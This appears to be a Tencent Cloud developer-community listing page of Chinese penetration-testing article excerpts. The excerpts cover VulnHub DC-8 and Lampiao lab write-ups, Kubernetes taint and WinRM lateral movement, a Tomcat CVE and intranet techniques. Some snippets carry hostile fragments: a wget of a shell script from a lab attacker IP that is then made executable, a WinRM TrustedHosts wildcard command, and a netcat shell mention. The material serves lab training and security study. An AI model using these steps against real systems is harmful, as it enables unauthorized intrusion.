- 综合排序
- 最热优先
- 最新优先
- 来自专栏靶机渗透
靶机渗透DC-8
用的时候出现一直失败,重新Shell一下还是不行,后来上网查是直接用netcat方式。
55720发布于 2020-04-21 - 来自专栏网络安全自修室
DC-8靶机渗透实战
靶机介绍 这次的靶机渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标。 渗透实战 ? ? 再来看看下面: Home: ?nid=1 传参了 而刚才上面的没有任何参数 ? ? ? 参考资料 [1] 下载地址: http://www.five86.com/dc-8.html [2] 参考文章1: https://blog.csdn.net/weixin_43762939/article
1.1K20发布于 2020-08-11 - 来自专栏网络安全攻防
K8s污点横向渗透
文章前言 污点是K8s高级调度的特性,用于限制哪些Pod可以被调度到某一个节点,一般主节点包含一个污点,这个污点是阻止Pod调度到主节点上面,除非有Pod能容忍这个污点,而通常容忍这个污点的Pod都是系统级别的
67800编辑于 2024-05-27 - 来自专栏网络安全攻防
K8s污点横向渗透
文章前言 污点是K8s高级调度的特性,用于限制哪些Pod可以被调度到某一个节点,一般主节点包含一个污点,这个污点是阻止Pod调度到主节点上面,除非有Pod能容忍这个污点,而通常容忍这个污点的Pod都是系统级别的
25800编辑于 2025-03-10 - 来自专栏网络安全自修室
每周打靶 | Vulnhub-DC8靶机渗透实战
靶机可从Vulnhub平台免费下载,并通过虚拟机在本地搭建,渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标! unix x2nhb wget 192.168.0.103/666.sh chmod 777 666.sh ls -l 87oty 拿到root权限,直接打开flag.txt 至此看到了flag,渗透测试结束
61530编辑于 2023-09-02 - 来自专栏vulnhub DC 1-9
VulnHub DC-8 靶机渗透测试笔记
VulnHub DC-8 靶机渗透测试笔记靶机信息靶机名称:DC-8靶机来源:VulnHub目标:获取 root 权限,找到最终 flag难度:⭐⭐⭐⭐☆(中等偏难)涉及技术:信息收集、SQL注入、hashcat 最终取得 flag:六、渗透流程总结信息收集(nmap + dirsearch) ↓发现 nid 参数 → 单引号测试报错 → 确认 SQL 注入 ↓sqlmap 跑库 → 拿到哈希 → hashcat searchsploit 本地漏洞库搜索 python3 http.server临时 HTTP 文件传输 本文为 VulnHub DC-8
21210编辑于 2026-03-08 - 来自专栏渗透测试专栏
渗透测试信息收集技巧(8)——Cobalt Strike配置
Cobalt Strike Cobalt Strike是一款渗透测试软件,分为客户端与服务端,可以进行团队分布式操作。 本文档所提供的信息仅用于教育目的及在获得明确授权的情况下进行渗透测试。任何未经授权使用本文档中技术信息的行为都是严格禁止的,并可能违反《中华人民共和国网络安全法》及相关法律法规。
80520编辑于 2024-09-26 - 来自专栏玄魂工作室
渗透,持续渗透,后渗透的本质
这几天Micropoor发布在github(https://github.com/Micropoor/Micro8)上的教程,突然爆红。 目标主机信息搜集的深度,决定后渗透权限持续把控。 渗透的本质是信息搜集,而信息搜集整理为后续的情报跟进提供了强大的保证。 持续渗透的本质是线索关联,而线索关联为后续的攻击链方提供了强大的方向。 后渗透的本质是权限把控,而权限把控为后渗透提供了以牺牲时间换取空间强大基础。 靶机背景介绍: ? 引言(2): 渗透测试过程,提权是非核心任务,这里也不建议尝试提权,因为在实战过程中获取某个“点”的权限,过程是及其漫长以及困难的,不要因为某个大胆的尝试,而影响了整个渗透测试流程。 后者的话: APT攻击三大要素,既:攻击手段复杂,持续时间长,高危害性 APT攻击主要分类为两大类,既:高级持续渗透 , 即时渗透 ? ? ? ? APT两大类攻击核心诉求区别: ?
1.8K30发布于 2019-03-14 - 来自专栏渗透测试专栏
渗透测试XSS漏洞原理与验证(8)——XSS攻击防御
本文档所提供的信息仅用于教育目的及在获得明确授权的情况下进行渗透测试。任何未经授权使用本文档中技术信息的行为都是严格禁止的,并可能违反《中华人民共和国网络安全法》及相关法律法规。
1.2K00编辑于 2024-11-09 - 来自专栏FreeBuf
渗透测试 | Tomcat渗透
目前版本型号7-10版本 默认端口:8080 安装 首先要有java的环境 注意:Tomcat的版本对与JAVA版本以及相应的JSP和 Servlet都是有要求的,Tomcat8版本以上的是需要Java7 Tomcat渗透 Tomcat任意文件写入(CVE-2017-12615) 影响范围 Apache Tomcat7.0.0-7.0.81(默认配置) 复现 这边我用vulhub sudo service 没有在被影响的列表中,用户仍需要下载9.0.19的版本来获得没有该漏洞的版本 2.关闭 enableCmdLineArguments参数 Tomcat弱口令&后台getshell漏洞 影响范围 Tomcat8 这边就还是用vulhub进行复现 cd vulhub-master/tomcat/tomcat8 sudo docker-compose up -d ? xml version="1.0" encoding="UTF-8"?
7K20发布于 2021-07-28 - 来自专栏FreeBuf
TEST LAB V8在线渗透实验室教程(三)
这一部分我们将演示渗透Mail和SSH系统 攻击MAIL 当前,我们已经有了Westfall的账号和密码,可以登录它的邮箱,通过浏览其收件箱,我们找到了另外两个与sas-bank相关的邮箱账号。
91750发布于 2018-02-07 - 来自专栏Bypass
【渗透技巧】内网渗透思路
本文将通过一些实例,分享一些简单的内网渗透思路。 0x02 信息收集 首先,对服务器资产信息进行收集,了解哪些ip是存活的,存活的ip开放了哪些端口,以及端口所对应的服务。 0x03 Web应用渗透 通过服务器资产探测,可收集服务器开放web端口,内网系统中,大部分web系统访问的界面都是登录界面,需要用户名密码进行认证。以某内网系统为例,进行实际渗透测试。 (8)使用administrator账号密码成功登录域服务器 ? 致力于分享原创高质量干货,包括但不限于:渗透测试、WAF绕过、代码审计、安全运维。
2.5K11发布于 2019-07-08 - 来自专栏网络安全攻防
【Web渗透】渗透测试简介
,从而达到更好的渗透测试效果 测试流程 PTES渗透测试执行标准是由安全业界国家领军企业技术专家所共同发起的,期望未企业组织与安全服务提供商设计并制定用来实施渗透测试的通用描述准则,PTES标准项目网站为 在前期交互(Pre-ENgagement Interaction)阶段,渗透测试团队与客户组织通过沟通需要对渗透测试的范围、渗透测试的方法、渗透测试的周期以及服务合同细节进行商定,该阶段通常会涉及收集客户需求 ,期望找出可被利用的未知安全漏洞,并开发出漏洞利用代码,从而打开攻击通道上的关键路径 渗透攻击阶段 渗透攻击(Exploitation)是渗透测试过程中最具有魅力的环节,在此环节中渗透测试团队需要利用他们所找出的目标系统安全漏洞来真正人侵系统当中获得访问控制权 ,渗透攻击可以利用公开渠道可获取的渗透代码,但一般在实际应用场景中渗透测试者还需要充分地考虑目标系统特性来定制渗透攻击,并需要挫败目标网络与系统中实施的安全防御措施才能成功达成渗透目的,在黑盒测试中,渗透测试者还需要考虑对目标系统检测机制的逃逸 ,从而避免造成目标组织安全响应团队的警觉和发现 后渗透的阶段 后渗透攻击(PostExploitation)整个渗透测试过程中最能够体现渗透测试团队创造力与技术能力的环节、前面的环节可以说都是按部就班地完成非常普遍的目标
2.8K40编辑于 2023-03-29 - 来自专栏全栈程序员必看
drozer 渗透测试_什么是渗透
1、python27环境,一定要官网下载 python2.7下载地址 2、安卓模拟器(我用的夜深,其他应该也可以),或者一台安卓真机 3、java环境 Java下载地址 4、ADB,adb(Android Debug Bridge)安装使用教程 – 诸子流 – 博客园 5、drozer,下载链接 6、drozer-agent,agent下载链接
2.2K10编辑于 2022-09-22 - 来自专栏FreeBuf
内网渗透:不出网渗透技巧
前言 在最近的攻防演练中,遇到几个内网环境都不通外网的情况,因此,整理下用到的几种不出网内网渗透技巧。 cs上线 cs逐渐成为内网渗透中使用最多的工具,在目标不通外网的情况下,无法直接与公网的cs服务端建立连接。 ms17010横向利用 内网渗透中常用的攻击手段,随着补丁和杀软的普及,能利用的场景越来越少,而且容易造成目标蓝屏,影响业务,所以谨慎使用。 之前的利用都是在通外网下情况下利用msf攻击。
5.1K11发布于 2020-08-28 - 来自专栏漏洞知识库
内网渗透之命令行渗透 - 渗透红队笔记
内网渗透 在内网渗透的时候,如果想要登录远程桌面,会容易暴露自己,所以尽可能学会使用命令行操作会在渗透实际过程中有很大的帮助。 命令行渗透 IPC$ ---- 建立ipc连接以后,就可以访问目标机器的文件(上传、下载),也可以在目标机器 上运行命令。上传和下载文件直接通过 copy 命令就可以,不过路径换成 UNC 路径。
2.4K30发布于 2020-11-25 - 来自专栏安全漏洞环境学习
渗透测试靶机Lampiao渗透WriteUp
protocol 2.0) | ssh-hostkey: | 1024 46:b1:99:60:7d:81:69:3c:ae:1f:c7:ff:c3:66:e3:10 (DSA) | 2048 f3:e8:
2.6K20发布于 2019-09-24 - 来自专栏HACK学习
内网渗透|利用 WinRM 进行横向渗透
这样的服务当然不会被攻击者错过,本篇文章我们就来讲讲 WinRM 在横向渗透中的使用。 这样的管理服务当然不会被攻击者错过,在内网渗透中,我们可以使用 WinRM 服务进行横向移动,并且使用这种远程连接进行横向移动不容易被察觉到,也不会占用远程连接数。 此时则需要先在客户端执行以下命令才能使用 Enter-PSSession: Set-Item wsman:localhostClientTrustedHosts -value * 利用 WinRM 进行横向渗透
6.4K40发布于 2021-09-29 - 来自专栏谢公子学安全
渗透测试 | 渗透测试之信息收集
一般在一个渗透项目下,你需要有多次的信息收集,同时也要运用不同的收集方式,才能保证信息收集的完整性。 而信息收集到底要收集哪些信息呢? 接下来,我就给大家整理了一下,渗透测试中常见的一些需要收集的信息。 域名信息的收集 当我们确定了要渗透的目标,也就是知道了其域名,接下来我们需要收集域名对应的 ip,域名的whois信息、子域名等等一系列与域名相关的信息。 传送门——> Github搜索语法 网站指纹识别 在渗透测试中,对目标服务器进行指纹识别是相当有必要的,因为只有识别出相应的Web容器或者CMS,才能查找与其相关的漏洞,然后才能进行相应的渗透操作。 对于单独网站的渗透测试,C段扫描意义不大。
4.1K11编辑于 2022-01-19 - 来自专栏红蓝对抗
【内网渗透】域渗透实战之 cascade
Meeting_Notes_June_2018.html在 Firefox 中查看时就像电子邮件一样:
1.6K40编辑于 2023-09-25
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号